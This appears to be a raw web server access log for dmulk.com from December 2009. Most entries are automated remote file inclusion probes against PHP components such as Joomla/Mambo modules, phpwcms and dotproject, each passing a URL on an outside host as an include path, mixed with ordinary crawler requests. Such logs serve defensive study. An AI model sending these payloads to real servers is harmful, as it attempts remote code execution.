65.55.107.237 - - [14/Dec/2009:11:28:37 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.0" 200 3864 "http://dmulk.com/blog/2008/08/16/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)" "dmulk.com"
65.55.107.237 - - [14/Dec/2009:11:28:40 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.0" 200 9759 "http://dmulk.com/blog/2008/08/16/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)" "dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:43 -0800] "GET /logs/access_091129.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:43 -0800] "GET /com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:43 -0800] "GET /logs//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:28:52 -0800] "GET /logs/access_090815.log HTTP/1.0" 200 4193671 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.107.237 - - [14/Dec/2009:11:28:52 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.0" 200 12100 "http://dmulk.com/blog/2008/08/16/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)" "dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:55 -0800] "GET /logs//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:55 -0800] "GET /com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:28:55 -0800] "GET /logs/access_091129.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:29:10 -0800] "GET /logs/access_091111.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:29:47 -0800] "GET /logs/access_091111.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.94.220.208 - - [14/Dec/2009:11:29:48 -0800] "GET /logs/access_071227.log HTTP/1.1" 200 452672 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:30:11 -0800] "GET /logs/access_080311.log//ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:11:30:17 -0800] "GET /logs/access_080420.log/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:30:31 -0800] "GET /bikes/dteel/2008_10_25/ HTTP/1.0" 200 4079 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:30:54 -0800] "GET /logs/access_080311.log//ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:30:54 -0800] "GET /logs/access_090723.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:30:54 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:30:54 -0800] "GET /logs/access_090227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:30:54 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:11:30:57 -0800] "GET /logs/access_090326.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:31:03 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:31:03 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:31:03 -0800] "GET /logs/access_090723.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [14/Dec/2009:11:31:03 -0800] "GET /logs/access_090227.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:11:31:05 -0800] "GET /logs/access_080501.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:11:31:23 -0800] "GET /logs/access_080211.log/////////?cmd&file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:33:08 -0800] "GET /logs/access_091111.log%20%20//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:33:08 -0800] "GET /logs/access_091129.log%20%20//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.67.19 - - [14/Dec/2009:11:33:26 -0800] "GET /xabhlijedaabjchbf.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:33:50 -0800] "GET /logs/access_091129.log%20%20//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:33:50 -0800] "GET /logs/access_091111.log%20%20//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:15 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:17 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:34:17 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [14/Dec/2009:11:34:59 -0800] "GET /?include_path=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 200 15420 "-" "-" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:35:44 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:35:45 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:35:47 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:35:48 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:35:54 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:35:54 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:35:54 -0800] "GET /logs/access_071225.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:36:07 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:36:07 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:36:07 -0800] "GET /logs/access_071225.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:08 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:08 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:08 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:09 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:11 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:11 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:11 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:36:12 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:11:36:39 -0800] "GET /logs/access_090326.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:11:36:44 -0800] "GET /logs/access_080501.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:36:51 -0800] "GET /logs/access_080722.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:11:37:05 -0800] "GET /logs/access_080722.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:37:30 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:37:30 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:37:33 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:37:33 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:33 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:33 -0800] "GET /dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:35 -0800] "GET /logs/access_090608.log%20%20//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:11:37:36 -0800] "GET /logs/?N=D HTTP/1.0" 200 130191 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:42 -0800] "GET /dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:42 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:37:42 -0800] "GET /logs/access_090608.log//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:52 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:52 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:52 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:53 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:55 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:55 -0800] "GET /logs/access_080103.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:56 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:37:57 -0800] "GET /logs/access_091120.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:38:33 -0800] "GET /dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:38:33 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:11:38:33 -0800] "GET /logs/access_090608.log//dotproject//includes/db_connect.php?baseDir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:39:20 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:39:20 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:39:27 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:11:39:28 -0800] "GET /logs/access_091120.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:11:40:13 -0800] "GET /dotproject//includes/db_connect.php?baseDir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:11:40:13 -0800] "GET /logs/access_090608.log%20%20//dotproject//includes/db_connect.php?baseDir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:11:40:13 -0800] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:11:41:22 -0800] "GET /logs/access_090408.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:11:41:22 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:11:41:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:11:41:24 -0800] "GET /logs/access_080222.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:41:34 -0800] "GET /logs/access_090826.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:41:39 -0800] "GET /logs/access_080520.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.181.125.68 - - [14/Dec/2009:11:42:04 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:11:42:13 -0800] "GET /logs/access_080520.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:11:42:19 -0800] "GET /logs/access_090826.log//com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.33.77.13 - - [14/Dec/2009:11:42:46 -0800] "GET /SQuery/lib/gore.php?libpath=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.33.77.13 - - [14/Dec/2009:11:42:50 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.33.77.13 - - [14/Dec/2009:11:42:50 -0800] "GET /logs/access_081023.log%20%20/SQuery/lib/gore.php?libpath=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:17 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:17 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [14/Dec/2009:11:43:17 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.koreanschoolny.com//board/script//id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:11:43:17 -0800] "GET /logs/access_080520.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
